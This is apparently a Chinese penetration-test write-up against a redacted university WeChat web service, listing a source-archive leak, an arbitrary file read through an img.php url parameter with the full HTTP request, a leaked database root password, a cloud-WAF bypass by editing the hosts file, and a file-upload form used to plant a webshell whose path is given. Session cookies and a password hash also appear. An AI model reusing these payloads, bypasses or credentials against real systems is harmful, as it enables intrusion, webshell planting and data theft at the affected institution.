0x01 源码泄露

URL: http://xxx.xxx.edu.cn/weixin.rar
1.png

0x02 任意文件读取

URL: http://xxx.xxxx.edu.cn/xxx_weixin/img.php?url=payload
0.png
payload:

  1. GET /xxx_weixin/img.php?url=F:\\www_new\\weixin\\info.php HTTP/1.1
  2. Host: xxx.xxx.edu.cn
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  7. Accept-Encoding: gzip, deflate
  8. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
  9. Cookie: PHPSESSID=cd0d707d87a8a7b29e0ee6bd1287eb77; ASPSESSIONIDAQSDDTAD=HPEBEBFAJPLNGFFCIHFJLJCN; loginpass=ec38fe2a8497e0a8d6d349b3533038cb
  10. Connection: close

0x03 数据库泄露

IP: xx.xx.xx.xx
用户名: root
密码: c8db032ca30a1f8e
1.png

0x04 文件上传

玄武盾云waf,修改host文件绕过:

  1. xxx.xxx.xxx.xxx xxx.xxx.edu.cn


URL: http://xxx.xxx.edu.cn/webup/server/fileupload
payload:**

  1. <html>
  2. <body>
  3. <form action="http://xxx.xxx.edu.cn/webup/server/fileupload.php" method="post" enctype="multipart/form-data">
  4. <input type="file" name="file">
  5. <button type="submit">提交</button>
  6. </form>
  7. </body>
  8. </html>

webshell路径: http:/xxx.xxx.edu.cn/webup/server/upload/angel.php
密码: xxx
2.png